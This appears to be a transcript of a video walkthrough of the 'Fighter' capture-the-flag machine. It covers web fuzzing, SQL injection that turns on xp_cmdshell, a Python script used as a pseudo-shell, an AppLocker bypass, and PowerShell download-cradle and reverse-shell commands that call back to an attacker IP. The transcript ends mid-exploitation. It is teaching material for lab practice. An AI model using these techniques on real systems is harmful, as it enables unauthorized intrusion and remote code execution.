What's going on YouTube? This is Ipsec, and this is probably going to be one of the more complex and difficult videos I've done because the box we're doing is Fighter, which is really difficult. It took me the better part of 3 or 4 days when this box was initially released to do it, and when you explain it, it doesn't sound that hard. You essentially do a bunch of fuzzing on a web server, find a old link that is SQL injectable, run code, get PowerShell, and then eventually escalate up to root with a Capcom exploit, and then do some easy reversing on a binary to get the flag. Sounds easy, but there's a bunch of things in the way, like antivirus, AppLocker, etc., that just slow you down. And not to mention, the SQL injection is ridiculously tough to do because it requires creating your own script. I don't think any open source tools will just automatically do it because it's set up in a slightly different way to make it difficult. So let's just jump in. The first thing we're going to do is nmap the box. So nmap-sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it fighter. Then the IP address, which is 10.10.10.72. It does take some time to run, so I've already run it. Looking at the results, we see only one port is open. That is IIS on port 80, and it's version 8.5. So this is Windows 2008 R2. If you just Google Windows IIS versions, Google should really tell you exactly what goes to it. If we clicked on more rows, we'd see 8.5 is Windows. Oh, it must be Windows 2012 R2, not 2008. That's odd. I thought it was the 2008 box, but maybe 2012. So, version of Windows, unknown yet, probably going to be 2012 R2. But the only way to really find out is to shell the box, so let's do that by going to 10.10.10.72, and we just see Street Fighter Club website. It looks like all these links go just to the anchor, hashtag or pound, whatever you want to call this, but they're all dead links. Looking at the very first announcement, we see they're currently redesigning the website streetfighterclub.htb, so we know what the server name probably is. We can go and edit our host file to add that. So let's see, host, and then 10.10.10.72, streetfighterclub.htb. And if we keep reading, it says their old member site is still available for registered members, but makes us go find the link. So let's start doing that. Let's check robots.txt. We get a 404 not found, so let us start up GoBuster. And I am now on GoBuster 2.0 because I updated Kali, so you may want to do the same, but we're not using any of the new functionality. So word list, user share, word list, GoBuster, then directory list 2.3 medium.txt -u for URL. We're going to do streetfighterclub.htb. and -o to specify the out file, gobuster-root.log. And I'm using the domain name instead of IP because generally web servers like having a host name. So we do see multiple hits for images. That's a 301 redirect, and the reason is Windows isn't case sensitive, so these are all the same thing. If we go to /images, it redirects us to putting a slash on the end and 403s us. I'm going to try wp-admin while that goes, see if it was a WordPress site. Long shot, but sometimes you just take those. While GoBuster is running, I'm going to try to brute force subdomains as well. And to do that, I'm going to use a tool called WFUZZ. And we're going to specify -w for word list, user share, word list. I'm going to use actually seclist. If you don't have this, you can just apt install it. It's in the Kali repo. Then discovery, DNS, and we're going to try, let's do subdomains. Out of the top million, we'll do 5,000 of them. Then -u, we're going to do streetfighterclub.htb. And the reason why we're not doing fuzz here is none of these subdomains for streetfighterclub.htb will resolve. It's just going to my Verizon sandbox because I'm using Verizon's DNS servers. But Anyways, since these DNS names don't actually resolve, we want to specify the, I think, host header field, and that's a -h, either lowercase or uppercase. I think uppercase H. Help is lowercase. Uppercase H is to specify a header. So, -uppercase H, fuzz.streetfighterclub.htb. And if you haven't figured it out, WFUZZ, whenever you have a capital fuzz, that's what puts the item in the word list. Did not like that. What do we have? Where's the error? Wrong header. Oh. Host colon. And let's see. Let us hide characters. That's -HH. It would be -HC to hide characters, but code is -HC, so HH. Actually, we'll just hide words. Any page with 717 words on it, just ignore. And we get members comes back right away. That has 92 words. So let us go into our... I shouldn't have killed that, but that's the one. I've just killed it, so some of the resources on my VM freeze up, so it's not going slow. Go into Etsy host. Let's do members.streetfighterclub.htb. And we can try it in Firefox, see what happens. We do get a 403. So let's go back to GoBuster, kill this, and now we want to try brute forcing members.streetfighterclub.htb, and GoBuster will do subdomain members. And /old redirects us, so let's see what is at /old. Access denied. So it looks like now we have to brute force a login page or another page within /old. A lot of brute forcing right now going on. So let us find a good word list. Going back into SecList, let's do discovery, web content, any logins.fuzz.text. Let's try that. So copy this URL, and we will GoBuster -w -u is going to be members streetfighterclub.htb/old, and then we want to specify -o for out file. GoBuster login old, I guess, .text. Try this, and right away we get login.asp comes back with a 200. So let's try old login.asp. Welcome to the members area. Finally, we have made it here. So let's just try like admin, and nothing. So let's switch over to burp. So we can intercept this request. Intercept is on. Try, let's see. See what this does. So we did change login type and checked remember me. Click go. Go back into burp, just send this in repeater, forward along. And then we'll try it with those unchecked. Admin. Send this. Send this to repeater. So all we're doing is comparing two requests. So we have username admin, password admin, login type equals 2. And this was with user. So login type 2 is probably user, B1 equals login. Let's check this one. We have admin, login type 1, remember me is on, and B1 is login. So if we click go and click go here, let's see. Don't really notice a big difference between these two requests. Change login type to 1. And nope, don't really notice anything. Both of them are telling us to set cookies and just saying the object moved. So let's follow redirection on both of them. I'm trying to find out what the difference between the two requests is. So it's saying it moved again. And it moved again. So 2017 bytes on that one, 2017 bytes on this one. Looks like they're relatively the same. But because this one has just more options, I'm always going to do the one with remember me. Let's unset that. Let's try admin, admin. Click remember me. Send this to repeater, and we can close that one. And let's just fuzz this. So admin plus or 1 equals 1. Nothing there. Let's try login type is equal to 3. Nothing there. Put junk in login type, and we get a error 500. Let's put a SQL comment, which is dash dash and then a space. I always do the second dash just so you know there's a space. And we get a 301. So if we put random junk after the comment and then before the comment, and we get another error message. So we can be relatively certain that it processed this comment. So let's try 3 or 1 equals 1. Click go. And if you're really paying attention, you'll see that an email comes back. If we change this to a false statement, no email. If you just tried this, you'd get no email. So through a Boolean injection, we have changed this to say, hey, if 1 equals 1, it's a valid login, let us in. And it returns something back in the email. So let us go to the Decoder tab, decode the URL encoding, then unbase64 this, and we'll get the email. But more importantly, let's just follow the redirection, and then we get an error service is not available. But I'm looking at level. Let's see what level is. So decoder, smart decode, -1. So let's try changing level to, I don't know, 1 and not -1. Repeater 1. Fuzzing the level 2, level 3. So I'm guessing level is probably going to be user or admin, and I'm just playing with this to see if service ever becomes available. And we probably have to base64 encode this since everything else is. So Decoder tab, encode, base64, and then we probably want to encode as a URL. Go back to repeater, and where level is, put this in. And we always get services not available. So we can assume this page is down, but we got a SQL injection. So let's go back and where SQL request is, and try getting information from this database. So let's try a union select 1, error message 2, error 3, 4, 5, 6, and we get it valid here. So let's see what this email is. Go to Decoder, 5, smart decode, then decode base64, 5. So anything we place here, please subscribe. We have to URL encode that. Do not close out the quotes. Let's try different quotes. Didn't like double quotes for whatever reason. But we placed a string in field 5. If we decode this, we get that string. So let's try figuring out what type of database this is. At version, a SQL command. Got a bunch of information here. Go back to Decoder tab. Smart decode, decode as base64. And we have Microsoft SQL Server 2014 Express Edition. So we know this is a Microsoft SQL Server. Microsoft SQL is normally vulnerable to stacked queries. Generally, I went to like NetSparker, SQL Injection cheat sheet. And this is a relatively decent reference. So if we go to this URL, they have tons of information, but when stacked queries work, and we have ASP SQL Server, green showing it does work. So let's see exactly what that is. If we go back to repeater, we can do like select 1, and the query works. If that select statement is not valid, we get an error message. So we can actually chain multiple SQL queries, which is going to be handy because that will allow us to do things like enable XP CMD shell. If we wanted to, we could probably test if XP CMD shell was enabled. Let's see, test XP CMD shell enable, check query, maybe that's it. Let's see. This may work. Let's see. So if we do login type and then union select 1, 2, 3, 4, paste this, we'll see if it works. I'm just making all these double spaces, a single space, and ensuring there's no like tabs in this query. Because these spaces looked odd to me, just from eyeballing it. Okay, maybe this will work. Maybe it won't. Maybe it will, maybe it won't. Copy that. Paste it in field 5. Add a field 6. And we will highlight this, press Ctrl U to URL encode it. Click go, and we get an error message. Let's see. Do we have to put this in double quotes? Was it single quotes it didn't like or double quotes it didn't like? Still an error message. Let's see. Can't encode that anymore. Let's make sure we didn't have any errors here. So unURL encode this. Select convert int is null value use config value. Huh. That looks correct. Let's see. Look at this one more time, and then we'll just move on and assume it's not enabled, because I don't think it's enabled by default, and you normally have to enable it with the stacked query. So let's see. Maybe it doesn't like this semicolon here, because it could be like viewed as a stacked query. So let's encode it. Click go. Let's remove this. send3b, click go, and we notice something different in the header. So when we have that semicolon there, it only gives us check back. Without it, we get level password name. So we know we did something because we made it further than the script, because the script is now giving us more output. Generally, more means you made it further in the code. So let's try putting this in double quotes to see if it likes double quotes instead. No, it does not. So move that, go back. We're still getting an error message, so let's just try one last thing and change the case on this just in case it has a bad blacklist blocking xpcmd shell that is all lowercase. And it looks like it does, because now we didn't get an error message and we get email back. So if we smart decode base 64, we get 1, which I believe means xpcmd shell is enabled. And we're going to run the commands to enable it just in case, because I don't think it's supposed to be enabled by default. Maybe it is, maybe it isn't. But we will run those commands to enable it. So this window can be called check enabled, I guess. And we'll always have that saved. So the next thing we do is we want to configure a stacked query to enable xpcmd shell. So to do that, let us just run a different command. And as I did that, I realized I just overwrote the window I tried to save. Checking if it's enabled is not important, so we'll just disregard that for the rest of the video, and we'll have enable RCE as this tab. But the command to do this is, let's see, we want to execute sp configure show advanced options, set that to 1. Then we want to exec sp configure xpcmd shell and set that to 1. Then we just want to reconfigure. So let's see. Exec sp configure show advanced options 1. Exec sp configure, yeah. Then xpcmd shell 1. That should be good. Click go. Object is moved. So we have now just enabled the xpcmd shell. It was already enabled, but we did it again for good measure, because I'm not sure if you'll have to or not. I'm not sure why it was. The next thing we do is now run commands. So run command, and we can just simply do exec sp xpcmd shell who am I. Try this. Does this error? It does not. But we don't get any output. We can try like ping 127.0.0.1. And I was just seeing if it would take longer to come back. So I'm not sure if this is threaded or not. And what I mean by that is when I run this ping, I'm not sure if the request is going to wait for all these to come back before it responds with a web page. What I do know is it likes double quotes, not single quotes. That it definitely likes. So let's see. Let's try creating a table and then outputting the results of xpcmd shell in a table. So we can do create table ipsec, and then we want to say the column's output, and I'm trying to remember the syntax for this. My apologies. I think output varchar 9001, maybe. It's probably will error out. Yeah, so let's do MSSQL create table. Let's see, create table employees. D not all lost name. It's all in the same parenthesis. Try this. Let's see, let's URL encode this so I can see what all their special characters are. Create table ipsec output varchar 9001. Create table employees. First name varchar 50. That should work. Let's try this again. Go. Internal error. Let's see. Let's just try shrinking varchar. Maybe you don't always want to be above 9,000. So we'll try 1024. That sounds like a easy to visible number for varchar that's relatively small. Try that. And there we go. So that was the issue. We just had it being too big. So now we should be able to insert XP command inject into this table. So we can do that. Let's see. Oh, we're still on run command. So let's rename this to create table. Create a new one and run command. So let's see. We want to do insert into ipsec output. And we want to insert the contents of XP CMD shell. And then we'll do who am I? Okay. URL encode this. Click go. Looks like it ran. And now let's get the output. So remember, we have to do a union injection to get stuff out of the database. So 3 union select 1 2 3 4 5 6. Comment for good measure. I don't think we have to do these comments, but whenever I SQL inject and add things, I normally put a comment at the end. So we want to do select top 1 from output where output is not null. There we go. Click go. And that did not work. Do we have to specify ipsec.output? Nope. Let's see. Let's get rid of this and dumb it down. So select, can we do count star from output? No, it does not like that. Do I have to URL encode any of this? No, I do not. Let's see. Oh. Select count output from ipsec. And there we go. So we have decode, smart decode, decode as base64, 1. Because we ran a command, we have 1 line of output. So that's exactly what we would expect. So we select output from ipsec. Select top 1 output. There we go. I always do top 1 when I'm doing this just to grab 1 line. Without that, it's grabbing multiple lines, and that is bad. base 64, we have fighter/SQL serve. So now we can do another command. Let's try go back to run command and try ipconfig. ipconfig, click go, get the output, and we're kind of stuck because it's still giving us the same exact output as before, which was the email. We can try order by descending, click go. Did not like that. Ascending, click go. Did not like that at all. But we have to create a auto incrementing primary key so we can easily pick which entries to do. Because if we do that count again, count output, we have multiple lines to go through. And this is looking a bit bigger. So decode this, base 64. We now have 10 lines in this. We only ran 2 commands. And the reason is it's taking every line in that IP config and inserting it into the database. So let us drop IPsec. So if we create a new one, let's just we have to do the stacked query. Drop tables IPsec. I don't know if it's table or tables. Table probably makes sense. There we go. So we dropped IPsec. We can go back to the create. And now we want to create one with a primary key. Whoops. WL encoded that. My bad. So if we do ID is an integer, the identity is going to be 1 for the seed, start at 1, increment by 1, and we call this primary key, put a comma, and hope I just did that correctly. Click go. Looks good. If we run ipconfig, that looked good. Get output, select count, OQ. Let's just change this. OQ, decode, base 64, probably needs 2 equals 9. So we have 9 lines of output. So we can do select output from IPsec where ID is equal to 1. See if that works. Well, we don't want count. We just want to select output. Where ID is equal to 2. There we go. So maybe 1 was null, or it just couldn't be viewed. Decode this, and we get Windows IP configuration. So if we increment this to 3, we'll probably get the next line. Doesn't like that. Try 4. Doesn't like that. 5. There we go. We got one. So, very temperamental, but looks like we're getting there. Ethernet adapter, Ethernet 0. So, this is going to be painful to do manually, or keep doing it manually. So, let us go and create a script to do this, because I think we have everything we need to create a script. So, let's go back. And we will make SQL inject, and we will v notes. I want to do notes on this side, and v inject.py on this side. Move this way over, because this script is going to get a little confusing if we don't lay it out correctly. So let us begin typing what we want to do. The very first piece being what modules we want to load. So let's see. To execute the exploit, we need to make a post request. So we want the request module to make post. Then what else do we need? Well, we need to be able to read the cookie because that's where the output is. And that will require base64, specifically B64 decode, to read the cookie. And then also we'll need a way to undo URL encoding. And that can be done in urllib parse unquote. So those are probably the modules we'll need. The very first thing we wanted our script to do is enable RCE mode, and this will do enable XP CMD shell. This only requires us to make a post request. We want to create a table so we can store our output, and this is going to require a post request as well. The next thing we want a script to be able to do is, well, run commands. So we need a way to run XP CMD shell, and that's going to require post, and this inserts multiple rows as a note to us. We also probably should, in this, truncate the table every time we run a command. We didn't show that in Burp, but if we're going to like loop through the table and echo everything in the table, we need to erase the table after we run it, or we'll show previous command history. Or we have to keep track of where we left off in the table, and no one wants to do that. So that will require a post as well. And I'm actually going to move this above XPCMD shell because we want to do it before we run a command. Then let's see. We got to get output somehow. So get output, and that's going to require us to get the number of rows, and that requires post, and it's also going to require standard out or something to read that cookie because we actually are interacting with the server. And then we want to print each line, and that's also going to require post and std out. And std out, I guess, we can define that to be the email cookie, and that does a URL encode and then a B64 encode. So that's essentially our script. And those are the things we have to keep in mind. So string it to modules, I'm going to import request because we know we need that. Going to import base 60. We'll do from base 64, import B64 decode from URL lib parse, import unquote. And now we want to create a class to stay organized. And when this initializes, we want to set proxies is equal to 127.0.0.1.80.80. And the only reason I'm doing that is we're probably going to have to do a lot of debugging, or maybe we won't. But this allows us to do debugging because it's going to put our script through a proxy in the future. So self.url, we're going to declare that to be http members.streetfighterclub.htb/old. We're posting to verify.asp. Now self proxies is equal to http, we'll do this in single quotes, proxies. Now we have to start creating all the SQL injections. So self enable XP shell is equal to 1. And let's copy this. Enable RCE. Paste that. And then we'll do, I think we want space there. I don't know if it matters. Okay. For posterity, we'll capitalize that. Okay. Why didn't auto go back? Okay, that's weird. Let's just print self.enable xp shell. Did I do that correctly? And we'll call this O for object, I guess, is equal to fighter. Python 3 inject.py. And I guess it works if it likes a lot of white space. I wonder if that's going to screw us up. If it does, we can always fix it. But I think for code readability's sake right now, I like that. So next thing we want to do is, let's see. We just did xpcmd shell, so we have to create table. So self.create table is equal to, it's another stacked query. Do I have it here? Create table on URL and quote. Copy, paste, and we'll do create table ipsec. That there, that there, and that. That looks good. Next thing we want to do is self dot. I guess we can truncate the table real quick. And I haven't showed that command, but it's relatively straightforward at truncate table ipsec. It's easy. So let's do self dot. Can we get command? I think that may be it for all we can statically display. So let's go through this. We got xpcmd shell, we got table, we got truncate. Running command, I don't want to do this way because it requires us to do dynamic output. So we'll do that later. So number of rows, it will require dynamic output, or dynamic. When I say dynamic output, I mean dynamic input, because we're actually changing something. This all here is completely static. So that should be good for the initialization of this class. So we can now create other functions. So the very first thing we have to do is a function to make a request, because posting is quite a common thing we have to do. So def make request, or definition make request, self, and then every request is going to do something, and we'll call that action. And all that's going to do is return request.post self.url, which is going to be members Street Fighter Club whatever. Proxies is equal to self.proxies. We don't want redirects, because every time it does this, we're doing object moves, and we don't want to follow that. All we want is to get that cookie immediately. Let's see. The data can be username admin password, please subscribe, login type, and this will be action because that's where the inject is, and then remember me, set that to on, and the last one is B1. B1 is set to login. Okay, that looks good. I think I forgot a single quote somewhere, because I don't remember this being read before we started. Let's comment out this. Yeah, that was white. So we screwed something up. Let's see. User, admin, password, please. Right here. This is where it starts going white. It says on. There we go. So the next thing we want to do is probably run commands. We just can make a request, so yeah, let's code the run command piece, cmd, and we're just going down. So enable RCE mode, almost all done. All the injects are there. We just have to make the requests. Actually, let's do that. On the initialization, let's do setting up exploit, and we can just do self make request self, and the action is going to be self dot enable xp shell, and the next one is going to be self dot create table. Okay. This done. We should be able to close that one all out. So run cmd. Very first thing we do is truncate the table according to this. So self dot make request self dot truncate table. Okay. Then the next thing we do is self dot make request, and I don't know exactly what that F means, but it makes these a lot more readable in Python 3 because I can specify commands that way instead of doing like that %s and then % at the end or dot format. I can just put the command I want in squiggly brackets. So this is going to be one insert into ipsec output exec xp cmd shell, and then single quote cmd single quote. I think that's good. And because we're putting xp-cmd shell in single quotes, I'm also going to do cmd is equal to cmd.replace single quote with double single quotes. So this way, if a command that we're running has a single quote, it's going to put two single quotes, which is kind of like the escape for a single quote and just puts a single quote. If that makes sense. Hopefully it does. And now we need a way to get output because the command is ran. So let's do def get output. Actually, output is going to require us to read cookies. So let's do def decode cookies self cookies, and we'll return b64 decode unquote to undo HTML encoding cookies email. Okay. So now we can code an output function. So def get output on self, and we're almost done. So we're actually going to get the post request back. So I'm doing equals self make request self dot. Ooh, we don't have something to get the count. So we'll call this get index, and we have to create a new query here to get the number of rows. So self dot get index is equal to 1. What is that? Union select 1, 2, 3, 4, 5, 6. And then we can do a comment for good measure. And this was select. We'll do top 1 ID from IPsec. So that's going to select, I think, the very last row. If it doesn't, then we can put an order by descending, whatnot. So output should now be able to get the number of lines. So we can do count is equal to int, because this needs to be a integer, self dot decode cookies and dot cookies. So this is going to be the whole request, and this is only going to send the cookies piece. So now I should be able to do for x in range of 1 to count, because that's going to be the max. Line is equal to self dot make request, then f1 union select 1, 2, 3, 4, 5, 6, and that. Okay, and in 5 we need to select top 1 output from IPsec where ID is equal to x. And then we end that nested query. Yeah, I think when you run a query within a query, it's called nested. When you run it outside, it's stacked. If you're wondering about terminology I'm using. And then we'll try output is equal to self decode cookie line dot cookies. So line is the whole request, again, just like when we did count. And I'm sending the cookies piece to decode cookies. And then we're going to do print output decode. And if we fail, do nothing. So now on run command, we can now specify we want to self get output. And we can finally do the last piece, which is run this. So while true, we'll do please work is equal to input shell and then run cmd please work. I think that's it, because this will kick off run cmd, which will insert stuff into the table, and that's going to kick off get output automatically, which is going to try to print out the results. There's no way this works, but it's worth a shot. Python 3 inject.py. Make request. 2 arguments, but 3 were given. Line 22. Self.makeRequest. What? Inject. Why were 3 given? That should just be 1. Self.enable XP shell. If we put this to 1 line, did I do that incorrectly? Is that going to move the error? Did not move the error. Print self.enable XP shell. 1 exec. That looks good. What is going on here? There's a stupid mistake somewhere. Does that happen on all of them? The next one. Yeah. Run CMD is not defined. 53. O.run CMD. Doesn't look like this works at all. So if we go in for, oh, intercepts on. History. So let's see. Who am I? We can see the response. Object moved. And email. Let's see. I should put something in like the header of the request that said where each piece was. So we're starting at 13. Let's run who am I. Does 14. This is the truncate table. That did not error. Insert into IPSEC. Who am I? That's good. Now let's see what this says. Select 1, 2, 3, 4. Top 1 ID from IPSEC. If we run this, look at email, we probably get 1. Okay. So then it does let's see, print count. Do I do for x in range 0 count? See if my decode cookies is working. Who am I? 1. Okay. Let's see. Line is equal to select top 1 output from IPSEC. I don't remember seeing that command. Select one. That's top one ID. So let's see. If I put this in 0 to count, who am I? Let's do count plus 1. Top 1 output from IPSEC. That's looking better. Let's see what this says. So select top 1 output from IPSEC where ID is equal to 1. Click go. We get email, and this should be decode base64 fighter SQL serve. So that is correct. I think we have an error in this cookie thing. And I only had decode cookie, not decode cookies. Who am I? There we go. IP config. Didn't work for that. Who am I? IP config. Doesn't work for multi-line. That is bizarre. Who am I works stellarly. Let's do system version. dir. So it's not incrementing. So let's see. Print count, Python 3. Who am I is 1 line. IP config is 1 line. That shouldn't be the case. That should be 9. So get index is screwed up. Select top 1 ID from IPSEC. And go figure, this is the one we didn't do in burp. So let's see what this looks like. Repeater. Paste. Nope. This was... We'll just type it. Because VI is going in visual mode and doesn't want to copy to my real clipboard. So select top 1 ID from IPSEC. One union select 1, 2, 3, 4, 5, 6. Select top 1 ID from IPSEC. It's probably capital. Always takes longer for the video than it does to actually do it. Click go. And that's just 1. Right? It didn't actually do what we thought it would do with that IP config. So run CMD. That is bizarre. Go to burp, proxy. We can actually just filter for IP config. Let's see. And a repeater, run command. So we have the output there. Let's send this one and see what we did differently between these two. Okay. well, this has cookies in it we don't need. Let's just actually copy from a one that works down here. And put the inject on its own line. It's going to be some silly mistake. Control-Shift-U. Control-Shift-U. Insert into IPsec output. We have double quotes here and single quotes here. Does that actually change the output that much? So if we run this, we're probably going to be at 10. To 1, we want ID, not output. ID from IPsec. And we don't need where IDs. So select top 1 ID from IPsec, click go. And this is still just 1. Let's see. If we order by descending, did not like that. I think order by is one word. Did not like that. Order by ID descending. There we go. I think that's it. The one we didn't test fully is the one that gave us the most issues. Smart decode. 3D. Decode as base 64. 6. So let us change our command, truncate table, get index, and this will be order by ID descending, ipconfig. There we go. And that's what I expected. So I was just grabbing the, well, it was doing exactly what it said. It was grabbing the top row from ID, which is always going to be 1 because that's the very top. If I order by descending order, it's going to grab the bottom. I wonder if I need that count plus 1 now. Let's see. ipconfig. There we go. That is looking much better. So I still wonder why this errored out. Self-create table. Make request takes 2 positional arguments, but 3 were given. Oh, crap. That. There we go. Whoami works, and now let's see. ipconfig. System info. This could take a little while to run. But now we have a actual working SQL shell. Sorry that took so long to get working, but we answered the question we had at like minute 1, and it's 2012 2. So the IIS version does not lie. Apparently my memory does. But we have completed all these tasks. We got the output, and we got standard out. So, essentially, the program, we define a bunch of SQL injections. We set up the server so we can enable XP command shell and create the table where we output or input our standard out to. I guess that's the best way to do it. We create a function so we don't have to put this data cookie a bunch of times. So we just create a wrapper around making a post request. Then we issue a XP command shell command and insert into the table we had created. And after that runs, we do get output, which then grabs the number of rows we have, then loops through and prints every single line. And it can do that because the very first thing we do and run cmd is truncate the table, which means erase table. So that is that piece. We're almost to the user shell, but this is where the box starts getting fun. So hopefully you enjoyed coding this pseudo shell. We can begin doing the box now. Sure, I'll save this. Exit that. Actually, there was one last thing I wanted to do, and that is make sure the script will work after a revert. So I reverted the box, and we're going to try running the script again. If I do who am I, it actually did not work. So some of our get the box ready for exploit doesn't work in the script. So what I'm going to do is go into burp, go into HTTP history, and see what we send. So this is the get output command. We got a 500 error. This is XP CMD shell. It actually runs, so that's odd. If we keep going down, this is the truncate table. That says it ran. Create table. We get a 500 error. And then this is setting up XP CMD shell to be enabled. And that runs. So this create table, that's a little worrisome. Did it fail because the table wasn't created to begin with? Or is there an actual error in this SQL? If we look at this, we can see it doesn't end with a parentheses. So going back to inject.py, where it's a bit easier to read, we open it up here and never close it. So let's put a last parenthesis to close it, run this, who am I, and there we go. Now the script is working, and we can jump in to trying to pop this box. And there are two ways to do this. I'm going to do it the intended way first, and then the second way, I'm going to do it the unintended way, I guess we can say. First thing I do is who am I /priv, and we see we have the SE impersonation privilege, and it's enabled. And this is going into the unintended way with JuicyPotato. JuicyPotato has to be used because bits is blocked, which prevents Rotten Potato and all the previous ones from working. You just specify a different CLSID. That doesn't make sense. Hopefully it will when we get to this box. So the first thing I want to do is try to get away from this pseudo shell and get a real shell, because I hate not having like a current working directory and hate having to specify full paths every time. So I'm going to do PowerShell, who am I? I'm going to get access is denied. So if you remember, there are two versions of PowerShell, a 64-bit and a 32-bit. When I just type PowerShell, I think it's going to C:\Windows\sys native or system32. It's going to one of those, and that is the 64-bit locations. If we specify C:\Windows\sys wow 64 \Windows PowerShell v1.0 PowerShell, who am I? This one actually runs. This is the 32-bit version. So when I was trying in PowerShell and got access to that, I'm like, okay, AppLocker's on the box or something is configured to prevent PowerShell. Okay, let's try the other version, because maybe they just blacklisted the 64-bit version if they specified the path weird or something. And it looks like that's what happened because the 32-bit works. So let us get a reverse shell with this. So if we do C:\Windows wow 64 Windows PowerShell v1.0 PowerShell, then we can do IX new object net.web client download string http 10.10.14. I think I'm 3. If config ton 0. Yes, I am 3. Then clean.ps1. I will do rev.ps1. Name really doesn't matter. So we have to make that file exist. Make dir dub cd dub, and then we'll copy opt nashang shells invoke PowerShell tcp.ps1 and copy it to rev.ps1. Then when we edit this, we want to take this example and invoke it as soon as it runs, just to save us running a command. So 10.10.14.3 port, we'll do 443. netcat lvnp 443. Run this. Doesn't look like it ran. So let's see. Unable to connect to the remote server. Oh. Of course. cd dub python simple http server 80. And we now can run this. Remote server return 404 not found, because this is expecting all caps, so we can move to rev.ps1. Run this one last time, and we get a connect back. So if we do who am I, we are still the fighter/SQL server, and we're in the 32-bit version of PowerShell, so our next task is trying to escape this. So I'm going to go into the Decoder's user folder, and I made a typo, cd users decoder. Do a dir here, and we see there is a clean.bat. The reason I was going in here is because this is where user.text is, and we get access to path that is denied. But seeing clean.bat, it's odd. If we look, we see a command to remove C:\users decoder app data local temp, so it's removing his temp directory. If we look in app data local, we don't have permission. So we're just going to have to go on a hunch that this is the next step of the box. If you didn't want to go this route, there are plenty of like AppLocker bypasses using PowerShell and MS build to run payloads, and maybe we'll do that at the end of the video, but that's not the AppLocker bypass I plan on using for the unintended method. So we're going to keep going with the intended method, and notice that clean.bat has an A, so it's in append only. We don't have write access. We can't erase the file. So if we just do like echo test to clean.bat, we get access to path is denied. If we do echo test double to clean.bat, it writes, and we can view the file and see that we did it. The issue is there is an exit, so that sucks, because if there's an exit, all this stuff below it won't run. We can, however, truncate with append permissions. So if we do system IO file open C:\users decoder clean.bat system IO file mode to truncate, we can now see we have erased the file. And I guess that command may have something weird where I didn't close the file. Weird. I don't know how to fix that. Exit a shell. And run it again. Maybe that'll fix it. cd users decoder, type clean.bat. Okay. Now that file isn't being held open, so I can view it, and it's empty. So the next step is to do the PowerShell -nop-c iex. Let's see, am I doing this correct? Yeah. C:\users decoder clean.bat. Notice I did a single quote twice because that's how you do a single quote when going too fast. PowerShell new object net.web client download string. Now I can do the double single quote because we already have a single quote back here. So double single quote to escape that essentially. And 10.10.14.3. We called it rev. We'll do rev-445.ps1. And I think that is all good. If I echo this, the command looks good. So let's try echoing this into clean.bat. Clean.bat. Let's copy. We have to go into www. Copy rev ps1 to rev 445.ps1. Edit this, go to the bottom, change the port, netcat lvnp 445, and here we wait. And if we do it correctly, we'll get a callback on our web server. If not, then we have to try again and see what we did wrong. So it's been a while and we never got a callback. So let's just bring back this file to our box and see if we added any weird bytes to it. Because if we just view it with type clean.bat, everything looks fine. So let's see if there's anything hidden in it. In order to do that, we have to convert it to base 64. So we'll do text is equal to get content clean.bat. If we look at text, we got that. So we can do bytes is equal to system.text.encoding unicode.get bytes text, and then encoded text is equal to convert to base 64 string and bytes. Encoded text, and let's see, we write host encoded text. Let's see, how do we display the actual text? This one's new. Did I do something wrong? Convert to base 64 string bytes, and bytes has text in it. Huh. Let's just try a different way to encode this, because I'm pretty sure that encoded text should have just given me text, and I don't see any property here that would be relevant to what we want. So if we do dir, we can do cert util -encode clean.bat, and we have to specify a place we can write to. C:\users SQL serve is a username, and we'll just write to test. So if we use type. We probably can view this file. There we go. Copy the string. Go on to fighter v clean.bat.b64. Paste the string. base64-d to clean.bat. And everything looks fine. If we do xxd, we can see there is junk before PowerShell. So it's putting, I don't know what byte that is, but it's certainly not what we want. So we could try doing like iconv-f ASCII-t UTF-16 and specify clean.bat. Does that do it? Illegal input sequence at position 0. I'm thinking there's something bad with that byte. So maybe it was the truncate or something, but something had screwed with our text file. So let us try a copy /y, so we always answer yes. Null, we're copying nothing to clean.bat. Position parameter cannot be found that accepts argument. cmd/c, and we'll try this way. Copy /y, null, clean.bat. There we go. So that's another way to clean it, and it's 0 in length. So if we did that PowerShell trick again, or echo trick again to write it to clean.bat, we're having an issue. But we found out we can just use copy to overwrite this file. So let us use sututil to put a file on the box and then copy it over top of it. So let's go back here, go in dub. We can vi, we'll call it launcher.ps1, and what we want is PowerShell ix new object net.web client download string http 10.10.14.3 rev-445.ps1. Cat this file, reread it, make sure it looks good. Does look good. And we can use sututil to also drop files on this. So sututil-url cache -split -f url 10.10.14.3/ we called it launcher.ps1, and we want to drop it to c:\users SQL serve launcher.ps1. Access is denied. So let's try getting rid of the extension because of, I guess, AppLocker or something. And now it's completed. So let's copy /cmd.exe to get out of PowerShell /c. Copy. Always answer yes. Launcher to clean.bat. We'll probably specify the whole file path. Users decoder clean.bat. Access is denied. Let's see, cmd.exe/c. I guess when you copy null to a file, it truncates it instead. I don't know. Let's try type. So if we type this file to print it out, and then direct that output to c:\users decoder clean.bat, do a dir. It looks like it worked, and it's 186 in length and not 200 something it was before, so it's looking better. And we just... Is that from now? 3816, 3825. It may have already started grabbing it. We may have hit that minute like perfectly. Or that, oh no, it would be getting 445. This is cert-util. Cert-util just grabs it multiple times, I guess. That's odd. So we're just now waiting to see if it now will call back, hit this, and then we'll get a shell, hopefully. So let the waiting continue. And it's been a while and we still haven't got a shell. So let us try something a little bit different and just look at how long our launcher file is. So dir launcher, it's 91, and clean.bat is 186. So we got some weird issue going on. I'm guessing it's the whole PowerShell likes UTF-16, I think it is. So let's copy y null to c:\users decoder clean.bat cmd.exe /c copy y null c:\users decoder clean.bat. Access is denied. Awesome. Let's try it again. So let's copy. Maybe we hit it when the computer was accessing it. Access denied still. Exit. Let's go back to our SQL server. Python 3. Inject. Let's get another shell. And I'm not listening. There we go. And we can try that copy again, because maybe our command prompt had it open. So cmd/c copy /yes null c:\users decoder clean.bat. There we go. So looks like we just had the file open somehow. c:\users decoder. Okay, it's empty. So if we look at the last time we did the directing to file, we let PowerShell handle it. So let's do it all within that cmd.exe to see if it doesn't go to UTF-16 format. I'm guessing that's what's happening. Clean.bat. Try it this way. dir 91. 91 bytes. That looks a little bit better. I think we may finally have this. So let's give it some time and see if it will give us a call back. We can just type it to make sure it is still what we think it is, and it is. We get a callback to Rev 445, and we don't get a shell. So either Decoder is also prevented from running PowerShell on 64-bit, or there's a firewall blocking 445. So what I'm going to do is let's go into our www directory, go into inject cd.www, go into launcher, and we're just going to call rev.ps1 and wait. So rev.ps1 is going on port 443, which we know can go out of the firewall. So I'm just 